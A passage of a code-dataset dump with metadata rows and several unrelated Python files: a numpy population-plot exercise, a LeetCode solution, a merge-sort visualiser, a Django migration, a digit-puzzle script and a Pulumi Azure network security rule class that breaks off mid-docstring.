blob_id (string, 40 chars) | directory_id (string, 40 chars) | path (string, 3–616 chars) | content_id (string, 40 chars) | detected_licenses (sequence, 0–112 items) | license_type (string, 2 classes) | repo_name (string, 5–115 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | branch_name (string, 777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64, 4.92k–681M, nullable) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (string, 149 classes) | src_encoding (string, 26 classes) | language (string, 1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 3–10.2M) | extension (string, 188 classes) | content (string, 3–10.2M chars) | authors (sequence, 1 item) | author_id (string, 1–132 chars) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
10a57f45023bd99e590058c70fed50cd5dbdabde | d6d20681f41102df3feb2b438ef80569bd73730f | /Uge4-numpy/.history/exercises_20200218211509.py | 721a35c816eab099a775532e7a3d12f563a27947 | [] | no_license | MukHansen/pythonAfleveringer | d0ad2629da5ba2b6011c9e92212949e385443789 | 4107c3c378f757733961812dd124efc99623ff2e | refs/heads/master | 2020-12-22T13:27:19.135138 | 2020-05-22T11:35:52 | 2020-05-22T11:35:52 | 236,796,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | import numpy as np
import matplotlib.pyplot as plt
from collections import OrderedDict
filename = './befkbhalderstatkode.csv'
data = np.genfromtxt(filename, delimiter=',', dtype=np.uint, skip_header=1)
neighb = {1: 'Indre By', 2: 'Østerbro', 3: 'Nørrebro', 4: 'Vesterbro/Kgs. Enghave',
5: 'Valby', 6: 'Vanløse', 7: 'Brønshøj-Husum', 8: 'Bispebjerg', 9: 'Amager Øst',
10: 'Amager Vest', 99: 'Udenfor'}
years = {1992: 0, 1993: 0, 1994: 0, 1995: 0, 1996: 0, 1997: 0, 1998: 0, 1999: 0, 2000: 0, 2001: 0, 2002: 0,
2003: 0, 2004: 0, 2005: 0, 2006: 0, 2007: 0, 2008: 0, 2009: 0, 2010: 0, 2011: 0, 2012: 0, 2013: 0,
2014: 0, 2015: 0}
east = {}
west = {}
specificHoods = {2: 'Østerbro', 4: 'Vesterbro/Kgs.'} #, 4: 'Vesterbro/Kgs.'
nordicCountryCodes = {5104: 'Finland', 5106: 'Island', 5110: 'Norge', 5120: 'Sverige'}
def getPopPerHood(hood):
deezMask = (data[:,0] == 2015) & (data[:,1] == hood)
return np.sum(data[deezMask][:,4])
def getPopPerSpecificHood(year, hood):
deezMask = (data[:,0] == year) & (data[:,1] == hood)
# print((data[deezMask][:,(0,4)]))
# return (data[deezMask][:,(0,4)])
return np.sum(data[deezMask][:,4])
def getOldPeople():
deezMask = (data[:,0] == 2015) & (data[:,2] <= 65)
return np.sum(data[deezMask][:,4])
def getOldNordicPeople(countrycode):
deezMask = (data[:,0] == 2015) & (data[:,2] <= 65) & (data[:,3] == countrycode)
return np.sum(data[deezMask][:,4])
def getSumOfOldNordicPeople():
lst = {}
for key, value in nordicCountryCodes.items():
# print(value, getOldNordicPeople(key))
lst.update({value: getOldNordicPeople(key)})
return lst
def getSumPerHood():
lst = {}
for key, value in neighb.items():
# print(value, getPopPerHood(key))
lst.update({value: getPopPerHood(key)})
return lst
def getSumPerSpecificHoods():
lst = []
for ykey, yvalue in years.items():
for hkey, hvalue in specificHoods.items():
# lst[ykey] = getPopPerSpecificHood(ykey, hkey)
if(hkey == 2):
east[ykey] = getPopPerSpecificHood(ykey, hkey)
else:
west[ykey] = getPopPerSpecificHood(ykey, hkey)
# print(value, getPopPerSpecificHood(key))
# lst[key] = getPopPerSpecificHood(key)
# lst.append({value: getPopPerSpecificHood(key)})
# d['a'] = 100 # existing key, so overwrite
# d['c'] = 3 # new key, so add
lst.append(east)
lst.append(west)
return lst
def displayPlotOfHoodsPop():
lst = getSumPerHood()
hoodsSorted = OrderedDict(sorted(lst.items(), key=lambda x: x[1]))
cityAreas = []
sumOfPeople = []
for key, value in hoodsSorted.items():
cityAreas.append(key)
sumOfPeople.append(value)
plt.bar(cityAreas, sumOfPeople, width=0.5, linewidth=0, align='center')
title = 'Population in various areas in cph'
plt.title(title, fontsize=12)
plt.xticks(cityAreas, rotation=65)
plt.tick_params(axis='both', labelsize=8)
plt.show()
def displayPopulationOverTheYears():
    getSumPerSpecificHoods() # Populates the east and west lists with data
yearsToDisp = []
eastpopulation = []
westpopulation = []
for key, value in years.items():
yearsToDisp.append(key)
for key, value in east.items():
eastpopulation.append(value)
for key, value in west.items():
westpopulation.append(value)
plt.figure()
plt.plot(list(range(1992,2015)), eastpopulation, linewidth=5)
plt.plot(list(range(1992,2015)), westpopulation, linewidth=5)
plt.title("Population over the years", fontsize=24)
plt.xlabel("Year", fontsize=14)
plt.tick_params(axis='both', labelsize=14)
plt.show()
# print(getSumPerHood())
# displayPlotOfHoodsPop()
# print('Number of people above the age of 65 --',getOldPeople())
# print(getSumOfOldNordicPeople())
# displayPopulationOverTheYears()
# print(getSumPerSpecificHoods())
print(displayPopulationOverTheYears()) | [
"[email protected]"
] | |
ab5f5aaf705c61d6d3a52fe6a016b2045c35009c | 099256b28df65fb7c90c077b060dca16b8655235 | /math/0x00-linear_algebra/100-slice_like_a_ninja.py | e1589c7bf3ddf30431df2717bebb8ee713b0f971 | [] | no_license | Immaannn2222/holbertonschool-machine_learning | 1cebb9a889b363669bed7645d102dc56ab943c08 | 80bf8d3354702f7fb9f79bbb5ed7e00fc19f788d | refs/heads/master | 2023-08-01T05:35:00.180472 | 2021-09-22T20:28:17 | 2021-09-22T20:28:17 | 317,624,526 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | #!/usr/bin/env python3
""" advanced task """
def np_slice(matrix, axes={}):
""" slices a matrix along specific axes """
new = []
for x in range(len(matrix.shape)):
if x in axes:
new.append(slice(*axes[x]))
else:
new.append(slice(None))
return(matrix[tuple(new)])
| [
"[email protected]"
] | |
bd4930323e802b96035529be61f106d64f693e9e | b92e187f60b1bc8bd74eaa0ffc6e1ac50911a08e | /django/dataset/detailsAPI/admin.py | 32e817d5754f1a5fc95bf212913daa6c3b9565d0 | [] | no_license | code-xD/codefundo-hack | ad5b149726188bd15be7476f14adf90f08ff33d7 | f4883015d2d5f4b1b6a493ffa58249c46fc544a1 | refs/heads/master | 2022-12-10T10:41:30.388439 | 2019-08-20T12:06:19 | 2019-08-20T12:06:19 | 195,676,080 | 0 | 1 | null | 2022-05-25T03:12:11 | 2019-07-07T16:56:28 | CSS | UTF-8 | Python | false | false | 127 | py | from django.contrib import admin
from .models import VoterDetail
# Register your models here.
admin.site.register(VoterDetail)
| [
"[email protected]"
] | |
1f2e6da575054c5f9539d0a9dfc2ceecc2f7f8ae | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /findMaxValueOfEquation.py | 44e49a562e323596044cf7ecbec22a3e97ebfb8e | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | from typing import List
class Solution:
def findMaxValueOfEquation(self, points: List[List[int]], k: int) -> int:
stack = []
j = 0
out = -12345678901234
for i in range(len(points) - 1):
while j < len(points) and points[j][0] - points[i][0] <= k:
tmp = points[j][0] + points[j][1]
while len(stack) > 0 and stack[-1] < tmp:
stack.pop()
stack.append(tmp)
j += 1
if points[i][1] + points[i][0] == stack[0]:
stack.pop(0)
if len(stack) > 0:
out = max(out, stack[0] + points[i][1] - points[i][0])
# print(i,j,stack,out)
return out
points = [[1, 3], [2, 0], [5, 10], [6, -10]]
k = 1
points = [[0, 0], [3, 0], [9, 2]]
k = 3
points = [[-19, 9], [-15, -19], [-5, -8]]
k = 10
print(Solution().findMaxValueOfEquation(points, k))
| [
"[email protected]"
] | |
de469789154588023215e0a3a02a630ce008e14b | 22029865c571f7f5ba18de77f8eea6b3e77b3bbb | /phiface/context.py | b995768e6a32eadfac7ff45dc5d059a29a2a5afd | [
"BSD-2-Clause"
] | permissive | mikejs/phiface | cfc100421afa4bef9c4afa6eb4ac8f7ae8d74163 | 2a2a5f8e1e555784cb2f2a27cecdf9c25a1c6044 | refs/heads/master | 2021-01-18T10:31:48.989712 | 2010-04-21T04:13:45 | 2010-04-21T04:13:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | import cairo
from shapely.geometry import *
PDFOutput = True
# flatten from:
# http://rightfootin.blogspot.com/2006/09/more-on-python-flatten.html
def flatten(l, ltypes=(list, tuple)):
ltype = type(l)
l = list(l)
i = 0
while i < len(l):
while isinstance(l[i], ltypes):
if not l[i]:
l.pop(i)
i -= 1
break
else:
l[i:i + 1] = l[i]
i += 1
return ltype(l)
class Context(object):
def __init__(self):
super(Context, self).__init__()
self.width = 1200
self.height = 800
if PDFOutput:
self.surface = cairo.PDFSurface("output.pdf",
self.width, self.height)
else:
self.surface = cairo.ImageSurface(cairo.FORMAT_ARGB32,
self.width, self.height)
self.ctx = cairo.Context(self.surface)
self.ctx.set_source_rgba(1.0, 1.0, 1.0, 1.0)
self.ctx.rectangle(0, 0, self.width, self.height)
self.ctx.fill()
def _drawCoords(self, coords):
self.ctx.move_to(*coords[0])
for (x, y) in coords:
self.ctx.line_to(x, y)
self.ctx.close_path()
def _drawPolygon(self, poly):
self._drawCoords(poly.exterior.coords)
for hole in poly.interiors:
self._drawCoords(hole.coords)
self.ctx.set_source_rgba(0.0, 0.0, 0.0, 1.0)
self.ctx.fill()
def draw(self, polygons):
poly = mergeSubPolys(polygons)
if type(poly) is MultiPolygon:
for subPoly in poly.geoms:
self._drawPolygon(subPoly)
else:
self._drawPolygon(poly)
def write(self):
if not PDFOutput:
self.surface.write_to_png("output.png")
def mergeSubPolys(polygons):
def _flattenPolys(polys):
polyList = []
if type(polys) is Polygon or type(polys) is MultiPolygon:
return polys
for p in polys:
if not p:
continue
if type(p) is list:
polyList += _flattenPolys(p)
elif type(p) is Polygon or type(p) is MultiPolygon:
polyList.append(p)
else:
polyList += flatten([_flattenPolys(p.getPolygon())])
return polyList
return reduce(lambda x, y: x.union(y), _flattenPolys(polygons)) | [
"[email protected]"
] | |
48c3f72ee6abaa8cbb830bcb382ccfefdb237956 | c36fc8f9bbc3e5891474bbbf17de09711cc9d0af | /alvi/client/scenes/merge_sort.py | 38997dcfec013867d20041a4f1f348d5d766e843 | [
"MIT"
] | permissive | alviproject/alvi | f527043c1ecaf4557188c312db7e8a8065ec054d | ec77919a546c11c46b178a21236792f8b0d95cbd | refs/heads/master | 2021-01-19T01:45:51.157037 | 2016-06-17T19:44:09 | 2016-06-17T19:44:09 | 13,392,604 | 10 | 5 | null | 2014-03-02T14:05:54 | 2013-10-07T18:54:09 | JavaScript | UTF-8 | Python | false | false | 1,116 | py | from alvi.client.scenes.sort import Sort
class MergeSort(Sort):
def merge(self, array, left, mid, right):
temp = []
for i in range(left, right):
temp.append(array[i])
i = 0
j = right - mid
k = 0
while k < len(temp):
if i >= mid - left:
array[k+left] = temp[j]
j += 1
elif j >= len(temp):
array[k+left] = temp[i]
i += 1
elif temp[i] < temp[j]:
array[k+left] = temp[i]
i += 1
else:
array[k+left] = temp[j]
j += 1
k += 1
def _sort(self, array, left, right):
if right - left <= 1:
return
mid = (left+right) // 2
self._sort(array, left, mid)
self._sort(array, mid, right)
self.merge(array, left, mid, right)
if (right-left) > array.size() // 50:
array.sync()
def sort(self, **kwargs):
array = kwargs['container']
self._sort(array, 0, array.size())
array.sync() | [
"[email protected]"
] | |
74abd35dc7be54c8af5452993644678fe289aae8 | 8fc9520d7224e6179f63f19e668b4b3b6a7d76c5 | /apps/catalogue/migrations/0006_auto__add_field_product_is_discountable.py | 35581eb19b16340bf4e806e466cfd03e6678e23f | [] | no_license | quantm/custom_django_oscar | 352ef2fd95e7da932958d4aa80d77dff5b6c1e70 | 9205807030ab360884283810e94177440c228a23 | refs/heads/master | 2016-08-09T12:23:39.413677 | 2016-02-08T22:16:53 | 2016-02-08T22:16:53 | 51,326,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,063 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Product.is_discountable'
db.add_column('catalogue_product', 'is_discountable', self.gf('django.db.models.fields.BooleanField')(default=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Product.is_discountable'
db.delete_column('catalogue_product', 'is_discountable')
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
},
'catalogue.contributor': {
'Meta': {'object_name': 'Contributor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
},
'catalogue.contributorrole': {
'Meta': {'object_name': 'ContributorRole'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'db_index': 'True'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'})
},
'catalogue.productcontributor': {
'Meta': {'object_name': 'ProductContributor'},
'contributor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Contributor']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ContributorRole']", 'null': 'True', 'blank': 'True'})
},
'catalogue.productimage': {
'Meta': {'ordering': "['display_order']", 'unique_together': "(('product', 'display_order'),)", 'object_name': 'ProductImage'},
'caption': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['catalogue.Product']"})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
}
}
complete_apps = ['catalogue']
| [
"[email protected]"
] | |
311eac1a6c280507906e8cf7a87844607ff9fddf | 04c7295ce65a623dc62454aa46ae4ae4ce51ca36 | /Lecture/Lecture_3/three_special_perfect_squares_v1_v3.6.py | 8f5b2aa24f0c1e10d1bad0df764379d50125baab | [] | no_license | hty-unsw/COMP9021-Python | 38373378162a314a82bf14453d026e641963e1b9 | 97be6dfa730247b59e608ec6d464ac16b4cf1968 | refs/heads/master | 2020-07-03T00:51:23.540099 | 2018-10-30T14:23:15 | 2018-10-30T14:23:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | # Describes all sets of positive integers {x, y, z} such that
# x, y and z have no occurrence of 0,
# every nonzero digit occurs exactly once in one of x, y or z,
# and x, y and z are perfect squares.
#
# Written by Eric Martin for COMP9021
from math import sqrt
def digits_if_ok(number, digits_seen_so_far):
digits_seen_now = set(digits_seen_so_far)
while number:
# Extract rightmost digit from number.
digit = number % 10
if digit in digits_seen_now:
return
digits_seen_now.add(digit)
# Get rid of rightmost digit of number.
number //= 10
return digits_seen_now
# If it was a perfect square, max_square would, associated with 1 and 4,
# be the largest member of a possible solution.
max_square = 9876532
nb_of_solutions = 0
upper_bound = round(sqrt(max_square)) + 1
set_of_all_digits = set(range(10))
for x in range(1, upper_bound):
x_square = x * x
# digits_in_x_square_and_0 is not None
# iff all digits in x_square are distinct and not equal to 0.
digits_in_x_square_and_0 = digits_if_ok(x_square, {0})
if not digits_in_x_square_and_0:
continue
for y in range(x + 1, upper_bound):
y_square = y * y
# digits_in_x_square_and_y_square_and_0 is not None
# iff all digits in y_square are distinct, distinct to 0,
# and distinct to all digits in x_square.
digits_in_x_square_and_y_square_and_0 =\
digits_if_ok(y_square, digits_in_x_square_and_0)
if not digits_in_x_square_and_y_square_and_0:
continue
for z in range(y + 1, upper_bound):
z_square = z * z
# digits_in_x_square_and_y_square_and_z_square_and_0 is not None
# iff all digits in z_square are distinct, distinct to 0,
# and distinct to all digits in x_square and y_square.
digits_in_x_square_and_y_square_and_z_square_and_0 =\
digits_if_ok(z_square, digits_in_x_square_and_y_square_and_0)
if not digits_in_x_square_and_y_square_and_z_square_and_0:
continue
if digits_in_x_square_and_y_square_and_z_square_and_0 != set_of_all_digits:
continue
print(f'{x_square:7d} {y_square:7d} {z_square:7d}')
nb_of_solutions += 1
print(f'\nAltogether, {nb_of_solutions} solutions have been found.')
| [
"[email protected]"
] | |
bd2567eb7e348826d18e2bd1cca6275f0f0602e8 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/network/v20180201/security_rule.py | fa3d42ca6372ba696deef9c4135a4eef42ff5c3b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,117 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['SecurityRule']
class SecurityRule(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
provisioning_state: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access: The network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
:param pulumi.Input[str] direction: The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are: 'Inbound' and 'Outbound'.
:param pulumi.Input[str] etag: A unique read-only string that changes whenever the resource is updated.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
:param pulumi.Input[str] provisioning_state: The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
